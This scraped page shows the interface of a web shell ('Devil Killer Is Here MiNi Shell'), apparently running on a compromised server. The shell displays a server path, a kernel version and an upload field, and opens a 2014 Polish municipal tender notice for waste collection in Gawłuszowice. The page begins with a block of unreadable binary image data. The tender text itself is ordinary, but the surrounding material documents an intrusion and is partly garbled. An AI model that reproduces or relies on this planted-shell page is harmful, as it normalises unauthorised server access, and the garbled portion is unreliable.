JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141121/383484-N-2014.html

<p class="kh_header"><b>Gawłuszowice: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu gminy Gawłuszowice</b><br>
<b>Numer ogłoszenia: 383484 - 2014; data zamieszczenia: 21.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gawłuszowice , Gawłuszowice 5A, 39-307 Gawłuszowice, woj. podkarpackie, tel. 017 7744282, faks 017 5819118.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gawluszowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu gminy Gawłuszowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Gawłuszowice w okresie od 01.01.2015 r. do 31.12.2016 r.
Ponadto wykonawca zobowiązany jest do odbioru i zagospodarowania odpadów komunalnych od właścicieli nieruchomości niezamieszkałych z terenu Gminy Gawłuszowice na warunkach określonych w umowach zawartych pomiędzy wykonawcą a właścicielem nieruchomości niezamieszkałej.
Szczegółowy opis przedmiotu zamówienia: 
1.	Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Gawłuszowice w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia 
i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach 
(Dz. U. z 2012 r. poz. 391 z późn. zm.). Powierzchnia Gminy wynosi 3 401 ha (34,01 km2), zamieszkuje ją 2227 mieszkańców (mk) w sołectwach:
Brzyście - 236 mk -  76 nieruchomości zamieszkałych
Gawłuszowice - 378 mk - 102 nieruchomości zamieszkałych
Kliszów - 543 mk - 150 nieruchomości zamieszkałych
Krzemienica	- 315 mk - 84 nieruchomości zamieszkałych
Młodochów	- 229 mk - 59 nieruchomości zamieszkałych
Wola Zdakowska	- 365 mK - 107 nieruchomości zamieszkałych
Ostrówek - 161 mk - 43 nieruchomości zamieszkałych
2.	Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie:
2.1.	Zmieszanych niesegregowanych odpadów komunalnych o kodzie 20 03 01 zgromadzonych w pojemnikach z budynków mieszkalnych,.
2.2.	Segregowanych odpadów komunalnych, gromadzonych w odpowiednio oznakowanych workach wystawionych na trasie odbioru, podanych poniżej rodzajów odpadów: 
a)	Papier, tektura oraz opakowania wielomateriałowe  ( kod 20 01 01, 15 01 01,15 01 05),
b)	tworzywa sztuczne oraz metal( kody 20 01 39, 15 01 02, 15 01 04, 200140),
c)	szkło bezbarwne i kolorowe ( kod 20 01 02, 15 01 07),
d)	odpady zielone i odpady ulegające biodegradacji ( kod 20 02 01).
2.3.	Pozostałych odpadów zbieranych dwukrotnie:
a)	przeterminowanych leków o kodzie 20 01 33,
b)	zużytego sprzętu elektrycznego i elektronicznego o kodach 20 01 35*, 20 01 36,
c)	odpadów niebezpiecznych powstających w gospodarstwach domowych(tj. opakowania 
po farbach, kleje, rozpuszczalniki, środki ochrony roślin, aerozole, środki czyszczące, wywabiacze plam, środki do konserwacji drewna oraz opakowania po tych substancjach, lampy fluorescencyjne i akumulatory) o kodach 20 01 13*, 20 01 14*, 
20 01 15*, 20 01 19*, 20 01 27*, 20 01 29*,
d)	odpadów wielkogabarytowych o kodzie 20 03 07,
e)	zużytych opon o kodzie 16 01 03,
f)	odpadów budowlanych i rozbiórkowych z bieżących remontów. 
2.4.	Orientacyjna liczba nieruchomości, z których będą odbierane odpady komunalne: 
- nieruchomości zamieszkałe - 630 gospodarstw domowych
2.5.	Orientacyjna liczba pojemników o pojemności 0,12 m3, 0,24 m3, 1,1 m3, które będą odbierane  co cztery tygodnie oraz worków 120 l z folii LDPE lub HDPE, które będą odbierane raz w miesiącu z nieruchomości:
- liczba pojemników o pojemności 0,12 m3 - 630 sztuk,
- liczba pojemników o pojemności 0,14 m3 - 60 sztuk,
- liczba pojemników o pojemności 1,1 m3 - 1 sztuka,
2.6.	Przewidywana liczba worków 120 L z folii LDPE lub HDPE w trakcie realizacji zamówienia: tj. od 01.01.2015 r. do 31.12.2016 r.
- worki koloru niebieskiego: papier, tektura, opakowania wielomateriałowe - 16.000 sztuk,
- worki koloru żółtego: tworzywa sztuczne oraz metal  - 28.000 sztuk,
- worki koloru białego: szkło, w tym szkło bezbarwne i kolorowe - 24.000 sztuk,
- worki koloru zielonego: odpady ulegające biodegradacji i odpady zielone - 6.000 sztuk.
Powyższe podane wartości są wartościami szacunkowymi. Zamawiający zastrzega sobie prawo do wprowadzenia zmian w zapotrzebowaniu co do ilości poszczególnych rodzajów worków. Zmiany mogą być zgłaszane przez Zamawiającego w trakcie realizacji usługi.
2.7.	Orientacyjna ilość odpadów komunalnych, którą Zamawiający przewiduje 
do odebrania od właścicieli nieruchomości w okresie realizacji zamówienia - 320 Mg. Ilość odpadów zebranych w roku 2013 - 266 Mg, w roku 2014 - 318 Mg. 
Podane ilości odpadów należy traktować szacunkowo i Wykonawcy nie przysługuje prawo dodatkowego wynagrodzenia lub odszkodowania za osiągniecie innych wielkości.
3.	Wykonawca zobowiązany jest do odbioru odpadów komunalnych gromadzonych na terenie poszczególnych nieruchomości w pojemnikach o pojemności 0,12 m3, 0,24 m3, 1,1 m3, oraz workach 120 l z folii LDPE lub HDPE przeznaczonych na gromadzenie odpadów w sposób selektywny.
4.	Wykonawca zobowiązany jest do dnia 3 stycznia 2015r. do wyposażenia, na okres realizacji zamówienia, nieruchomości w  pojemniki. Przewidywana ilość pojemników, którymi musi dysponować Wykonawca - 691 sztuk. Pojemniki muszą być wyposażone w identyfikatory RFID.
Powyższe podane wartości są wartościami szacunkowymi. Zamawiający zastrzega sobie prawo do wprowadzenia zmian w zapotrzebowaniu co do ilości poszczególnych rodzajów pojemników. Zmiany mogą być zgłaszane przez Zamawiającego w trakcie realizacji usługi.
5.	Wykonawca zobowiązany jest zorganizować odbiór zmieszanych odpadów komunalnych od właścicieli nieruchomości z ich posesji, z częstotliwością, co cztery tygodnie. Szczegółowy harmonogram odbioru odpadów Wykonawca ustali z Zamawiającym po podpisaniu umowy. Ponadto wykonawca ma obowiązek zarejestrować wykonanie usługi odbioru odpadów poprzez system identyfikacji RFID pracujący z częstotliwością 134,2 kHz zainstalowany na pojeździe. 
6.	Wykonawca zobowiązany jest zorganizować odbiór segregowanych odpadów komunalnych gromadzonych w workach z następującą częstotliwością:
a)	papier i tektura, metal - 1 raz w miesiącu,
b)	tworzywa sztuczne , odpady wielomateriałowe - 1 raz w miesiącu, 
c)	szkło bezbarwne i kolorowe - 1 raz w miesiącu,
d)	odpady zielone i ulegające biodegradacji  -  jednokrotnie w miesiącach czerwiec, wrzesień i październik, w każdym roku obowiązywania umowy.
7.	Szczegółowy harmonogram odbioru odpadów Wykonawca ustali z Zamawiającym po podpisaniu umowy.
8.	Wykonawca zobowiązany jest do wyposażenia raz w miesiącu w dniu odbierania odpadów, właścicieli nieruchomości od których odbierane są odpady komunalne gromadzone w sposób selektywny w worki 120 l z folii LDPE lub HDPE przeznaczone na gromadzenie poszczególnych frakcji odpadów wyszczególnionych w SIWZ. Worki zostaną oznaczone informacją o rodzaju gromadzonych w nich odpadów oraz nazwą, adresem i numerem telefonu Wykonawcy.
9.	Wykonawca do dnia 3 stycznia 2015 roku wyposaży właścicieli nieruchomości wskazanych przez Zamawiającego w komplet worków z folii LDPE lub HDPE o pojemności 120 l( niebieski, żółty, biały, zielony) , przeznaczone na gromadzenie odpadów w sposób selektywny, oznaczonych w sposób, o którym mowa w pkt 8.
10.	Wykonawca zobowiązany jest zorganizować w miesiącach maju i wrześniu w każdym roku obowiązywania umowy odbiór odpadów komunalnych obejmujących:
a)	zużyty sprzęt elektroniczny i elektryczny,
b)	 odpady niebezpieczne powstające w gospodarstwach domowych (tj. opakowania 
po farbach, kleje, rozpuszczalniki, środki ochrony roślin, aerozole, środki czyszczące, wywabiacze plam, środki do konserwacji drewna oraz opakowania po tych substancjach, lampy fluorescencyjne i akumulatory), 
c)	zużyte opony, 
d)	odpady budowlane i rozbiórkowe z bieżących remontów
poprzez zorganizowanie w dwóch miejscach wskazanych przez Zamawiającego punktu odbioru tych odpadów czynnego w godz. 8.00 do 16.00 przez jeden dzień roboczy.
11.	Wykonawca zobowiązany jest zorganizować w miesiącach maju i wrześniu w każdym roku obowiązywania umowy zbiórkę odpadów wielkogabarytowych w formie zbiórki mobilnej odpadów zgromadzonych przy nieruchomościach na trasie analogicznej do trasy, w przypadku odbierania odpadów zmieszanych.
12.	Wykonawca zobowiązany jest do dwukrotnego w każdym roku obowiązywania umowy odbioru przeterminowanych lekarstw z miejsca ich gromadzenia znajdującego się w budynku Apteki w Gawłuszowicach.
13.	Wykonawca zobowiązany jest do odbierania odpadów z poszczególnych nieruchomości w ustalonych w harmonogramie usuwania odpadów komunalnych terminach z zastrzeżeniem, że odbiór w/w odpadów musi odbywać się w godzinach 7.00 - 19.00.
14.	W celu realizacji przedmiotu zamówienia Wykonawca obowiązany jest posiadać bazę magazynowo-transportową oraz wyposażenie o odpowiednim stanie technicznym umożliwiające odbieranie odpadów komunalnych od właścicieli nieruchomości 
- zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. 
w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych 
od właścicieli nieruchomości (Dz. U. z 2013 r. poz. 122 ).
15.	Zamawiający zaleca zapoznanie się z warunkami terenowymi związanymi z realizacją zamówienia - zamawiający będzie wymagał, aby na drogach będących w zarządzie zamawiającego i dojazdach do posesji był użyty właściwy tabor transportowy, niepowodujący niszczenia dróg (część dróg wąska z ograniczonymi warunkami manewrowania).
16.	Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy 
to m.in. ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno
-prawnych związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.
17.	Odpady zebrane od właścicieli nieruchomości z terenu Gminy Gawłuszowice Wykonawca zobowiązany jest zagospodarować (poddać odzyskowi lub unieszkodliwieniu zgodnie z obowiązującym prawem), w tym zmieszane odpady komunalne, odpady ulegające biodegradacji oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania przekazywać do regionalnej lub zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych, właściwej dla regionu zachodniego województwa podkarpackiego zgodnie z uchwałą Nr XXIV/409/12 z dnia 27 sierpnia 2012 r. w sprawie przyjęcia projektu Planu Gospodarki Odpadami dla Województwa Podkarpackiego i uchwalenia Planu Gospodarki Odpadami dla Województwa Podkarpackiego. Odbioru odpadów komunalnych przez regionalną lub zastępczą instalację do zagospodarowania odpadów uwzględnioną z WPGO zapewnia sobie Wykonawca.
18.	W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania odpadów, Wykonawca zobowiązany jest do ich przekazywania do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w  ustawie. o odpadach. W zakres zamówienia wchodzi także porządkowanie terenu w miejscu gromadzenia odpadów w przypadku jego zanieczyszczenia przez wykonawcę.
19.	Wykonawca odpowiedzialny jest za osiąganie poziomów odzysku odpadów komunalnych z uwzględnieniem poziomów odzysku wskazanych w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U z 2012 r., poz. 391), Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U z 2012 r., poz. 645), oraz Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U z 2012 r. poz. 676). Wykonawca przed zakwalifikowaniem odpadów segregowanych do zmieszanych w wypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, sporządza na tą okoliczność dokumentację (np. oświadczenie, dokumentację fotograficzną) na poziomie umożliwiającym wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę wysokości opłaty. Dokumentację wraz z wykazem nieruchomości nieprawidłowo segregujących odpady oraz fakturą miesięczną za wykonaną usługę przekaże Zamawiającemu.
20.	Wykonawca zobowiązany jest do:
a)	ważenia wszystkich odebranych odpadów komunalnych w punkcie wagowym zlokalizowanym w miejscu przekazywania ,
b)	przekazywania odpadów do uprawnionego przedsiębiorcy wykonującego działalność 
w zakresie odzysku lub unieszkodliwiania odpadów komunalnych i uzyskania od niego potwierdzenia odbioru odpadów zebranych z terenu Gminy Gawłuszowice na karcie przekazania odpadów,
c)	terminowego zbierania i wywożenia odpadów,
d)	przeładowywania odpadów w legalnym i przystosowanym do tego miejscu,
e)	niezwłocznego zawiadomienia Zamawiającego o okolicznościach przeszkadzających w prawidłowym wykonaniu usługi.
f)	rozliczania się z wykonywanych usług poprzez przedstawienie wymaganych przepisami dokumentów,
g)	utrzymania w należytym stanie technicznym, sanitarnym i porządkowym narzędzi i urządzeń wykorzystywanych na potrzeby realizacji umowy,
h)	w sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie,
i)	wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi wszystkich wymogów wynikających z obowiązujących przepisów, dotyczących odbierania i zagospodarowania odpadów komunalnych.
21.	Wykonawca będzie prowadził i przedkładał Zamawiającemu dokumentację z realizacji przedmiotu zamówienia, tj.:
a)	Kopię karty przekazania odpadów, sporządzone zgodnie z obowiązującymi przepisami, kwartalną informację zgodnie z art. 9n ustawy o utrzymaniu czystości i porządku w gminach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść, przed upływem terminu składania ofert, wadium w wysokości 4.000 zł (słownie złotych: cztery tysiące). Przy wnoszeniu wadium należy podać znak sprawy: GG. 271.1.2014</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać: 1. Wpis do rejestru działalności regulowanej na odbieranie odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Gawłuszowice. 2.Zezwolenie właściwego organu na prowadzenie działalności w zakresie transportu odpadów. 3. Wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny. Ocena spełniania tego warunku będzie dokonywana, wg formuły spełnia/nie spełnia, na podstawie oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania wiedzy i doświadczenia Wykonawca zobowiązany jest przedłożyć wykaz, że w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę w zakresie odbioru odpadów komunalnych zmieszanych i zbieranych w sposób selektywny na rzecz właścicieli nieruchomości, w sposób ciągły, przez okres minimum 12 miesięcy, o masie łącznej minimum 500 Mg; z podaniem dla każdej ujętej w wykazie usługi jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Ocena spełniania tego warunku będzie dokonywana, wg formuły spełnia/nie spełnia, na podstawie oświadczenia i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający uzna dysponowanie przez Wykonawcę: 1) co najmniej dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych z pojemników, 2) co najmniej dwoma pojazdami przystosowanymi do odbierania odpadów zebranych selektywnie w workach, 3) co najmniej jednym pojazdem przystosowanym do odbierania odpadów bez funkcji kompaktującej. Ocena spełniania tego warunku będzie dokonywana, wg formuły spełnia/nie spełnia, na podstawie oświadczenia i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku osobami zdolnymi do wykonania zamówienia wymagane jest złożenie stosownego oświadczenia. Ocena spełniania tego warunku będzie dokonywana, wg formuły spełnia/nie spełnia, na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawca zobowiązany jest złożyć: opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 500 000 zł. Ocena spełniania tego warunku będzie dokonywana, wg formuły spełnia/nie spełnia, na podstawie oświadczenia i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
